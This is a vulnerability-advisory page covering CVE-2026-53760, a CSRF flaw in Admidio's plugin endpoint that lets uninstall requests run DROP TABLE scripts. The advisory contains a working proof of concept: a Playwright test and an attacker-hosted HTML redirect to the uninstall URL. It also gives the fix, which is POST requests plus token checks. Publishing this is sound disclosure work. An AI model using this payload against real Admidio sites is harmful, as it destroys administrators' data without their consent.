Skip to main content

Admidio CVE-2026-53760

MEDIUM
Cross-Site Request Forgery (CSRF) (CWE-352)
2026-07-09 https://github.com/Admidio/admidio GHSA-hm42-q32m-vj4f
5.2
CVSS 3.1 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
5.2 MEDIUM
AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:H/A:L
vuln.today AI
5.2 MEDIUM

PR:H reflects that only an admin-session victim enables impact; UI:R captures required navigation; I:H for irreversible DROP TABLE data loss; A:L for plugin disruption; C:N as no data is disclosed to attacker.

3.1 AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:H/A:L
4.0 AV:N/AC:L/AT:N/PR:H/UI:A/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N

Primary rating from GitHub Advisory.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:H/A:L
Attack Vector
Network
Attack Complexity
Low
Privileges Required
High
User Interaction
Required
Scope
Unchanged
Confidentiality
None
Integrity
High
Availability
Low

Lifecycle Timeline

1
Analysis Generated
Jul 09, 2026 - 14:38 vuln.today

DescriptionGitHub Advisory

Summary

The modules/plugins.php endpoint handles plugin installation, uninstallation, and update operations via GET requests without CSRF token validation. Because these are top-level navigations, browsers include SameSite=Lax session cookies. An attacker crafts a malicious page that, when an authenticated administrator visits it, triggers arbitrary plugin operations. The uninstall operation executes DROP TABLE SQL scripts and destroys plugin data.

Details

modules/plugins.php reads the mode (install, uninstall, update) and name parameters directly from $_GET:

php
// modules/plugins.php
$mode = admFuncVariableIsValid($_GET, 'mode', 'string');
$pluginName = admFuncVariableIsValid($_GET, 'name', 'string');

The file contains zero calls to SecurityUtils::validateCsrfToken(). Other administrative operations in the same codebase (such as the save mode in preferences) validate CSRF tokens correctly.

Because the operations use GET requests, modern browsers send SameSite=Lax cookies on top-level GET navigations (link clicks, redirects, window.location assignments). A cross-origin page triggers these operations by navigating the browser to the vulnerable URL.

The doUninstall() function is the most destructive path. It executes SQL scripts from the plugin's db_scripts/ directory, which contain DROP TABLE statements:

php
// modules/plugins.php - doUninstall()
function doUninstall($pluginFolder) {
    // Reads and executes SQL from $pluginFolder/db_scripts/uninstall.sql
    // Contains DROP TABLE statements
}

Proof of Concept

The following Playwright test demonstrates a cross-origin CSRF attack. An attacker hosts a page on a different origin that redirects an authenticated administrator's browser to the uninstall endpoint:

javascript
// playwright-csrf-poc.js
const { test, expect } = require('@playwright/test');

test('CSRF plugin uninstall via cross-origin redirect', async ({ browser }) => {
    const context = await browser.newContext();
    const page = await context.newPage();

    // Step 1: Admin logs in to Admidio
    await page.goto('https://admidio.example.com/adm_program/system/login.php');
    await page.fill('#usr_login_name', 'admin');
    await page.fill('#usr_password', 'password');
    await page.click('#btn_login');
    await page.waitForURL('**/overview.php');

    // Step 2: Admin visits attacker-controlled page on different origin
    // The attacker page contains:
    //   <script>window.location = 'https://admidio.example.com/adm_program/modules/plugins.php?mode=uninstall&name=birthday';</script>
    await page.goto('https://attacker.example.com/csrf.html');

    // Step 3: Browser follows redirect with SameSite=Lax cookies
    // The birthday plugin is uninstalled, its database tables dropped
    await page.waitForURL('**/plugins.php*');

    // Verify the plugin was uninstalled
    await page.goto('https://admidio.example.com/adm_program/modules/plugins.php');
    const content = await page.content();
    expect(content).not.toContain('birthday');
});

Simplified attacker page (csrf.html hosted on attacker origin):

html
<html>
<body>
<script>
  window.location = 'https://admidio.example.com/adm_program/modules/plugins.php?mode=uninstall&name=birthday';
</script>
</body>
</html>

When an administrator visits this page, the browser navigates to the Admidio uninstall URL with full session cookies, and the server uninstalls the birthday plugin.

Impact

An unauthenticated attacker tricks an Admidio administrator into visiting a malicious web page (via phishing, forum post, or embedded content) that performs plugin operations without visible indication. The uninstall operation executes DROP TABLE statements, causing irreversible data loss. The install operation activates plugins with known vulnerabilities. The update operation disrupts plugin functionality. The victim only needs to visit a single page.

Recommended Fix

Switch plugin install, uninstall, and update operations from GET to POST requests. Add SecurityUtils::validateCsrfToken() checks to all state-changing operations in modules/plugins.php, consistent with the pattern used elsewhere in the codebase.

--- *Found by aisafe.io*

AnalysisAI

Cross-site request forgery in Admidio's plugin management endpoint (modules/plugins.php) enables a remote attacker to trigger destructive plugin operations - including irreversible DROP TABLE SQL execution - against any authenticated administrator who visits an attacker-controlled web page. The endpoint processes install, uninstall, and update operations via unauthenticated GET requests lacking CSRF token validation, and SameSite=Lax cookie behavior causes browsers to automatically include session credentials on top-level GET navigations from cross-origin pages. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Attacker identifies Admidio instance and admin contact
Delivery
Admin phished via crafted link or embedded redirect
Exploit
Browser performs top-level GET navigation to plugins.php with SameSite=Lax cookies
Execution
Server processes request without CSRF validation
Persist
doUninstall() executes DROP TABLE SQL scripts
Impact
Plugin and associated data permanently destroyed

Vulnerability AssessmentAI

Exploitation Exploitation requires an Admidio administrator to have an active browser session (valid SameSite=Lax session cookie) and to follow a cross-origin top-level GET navigation to the vulnerable URL - for example, by clicking a phishing link, being redirected, or having `window.location` set by attacker-controlled JavaScript on any page they visit. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The provided CVSS 3.1 vector AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:H/A:L scores 5.2, reflecting that a high-privileged victim (admin) and user interaction are required. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker identifies a target Admidio installation and sends a phishing email to the administrator, containing a link to an attacker-controlled page hosting a single-line `window.location` redirect to `modules/plugins.php?mode=uninstall&name=<plugin>`. When the admin clicks the link while holding an active Admidio session, the browser follows the top-level GET navigation with full SameSite=Lax session cookies, the server executes `doUninstall()`, and the target plugin's `DROP TABLE` SQL scripts run without any confirmation prompt or visible error. …
Remediation Consult the vendor advisory at https://github.com/Admidio/admidio/security/advisories/GHSA-hm42-q32m-vj4f for the patched release version, as no specific fix version number was confirmed in the available data. … Detailed patch versions, workarounds, and compensating controls in full report.

Threat intelligence, references, and detailed analysis are available after sign-in.

More in PHP

View all
CVE-2012-1823 CRITICAL POC
9.8 May 11

sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not

CVE-2016-1555 CRITICAL POC
9.8 Apr 21

(1) boardData102.php, (2) boardData103.php, (3) boardDataJP.php, (4) boardDataNA.php, and (5) boardDataWW.php in Netgear

CVE-2024-11680 CRITICAL POC
9.8 Nov 26

ProjectSend versions prior to r1720 are affected by an improper authentication vulnerability. Rated critical severity (C

CVE-2025-49113 CRITICAL POC
9.9 Jun 02

Roundcube Webmail contains a critical PHP object deserialization vulnerability (CVE-2025-49113, CVSS 9.9) that allows au

CVE-2017-9841 CRITICAL POC
9.8 Jun 27

Util/PHP/eval-stdin.php in PHPUnit before 4.8.28 and 5.x before 5.6.3 allows remote attackers to execute arbitrary PHP c

CVE-2025-0108 HIGH POC
8.8 Feb 12

Palo Alto Networks PAN-OS management web interface contains an authentication bypass allowing unauthenticated attackers

CVE-2021-25298 HIGH POC
8.8 Feb 15

Nagios XI version xi-5.7.5 is affected by OS command injection. Rated high severity (CVSS 8.8), this vulnerability is re

CVE-2021-25296 HIGH POC
8.8 Feb 15

Nagios XI version xi-5.7.5 is affected by OS command injection. Rated high severity (CVSS 8.8), this vulnerability is re

CVE-2013-4983 CRITICAL POC
10.0 Sep 10

The get_referers function in /opt/ws/bin/sblistpack in Sophos Web Appliance before 3.7.9.1 and 3.8 before 3.8.1.1 allows

CVE-2023-6553 CRITICAL POC
9.8 Dec 15

The Backup Migration plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1

CVE-2024-46506 CRITICAL POC
10.0 May 13

NetAlertX (formerly PiAlert) versions 23.01.14 through 24.x before 24.10.12 allow unauthenticated command injection thro

CVE-2024-8353 CRITICAL POC
9.8 Sep 28

The GiveWP - Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all

Share

CVE-2026-53760 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy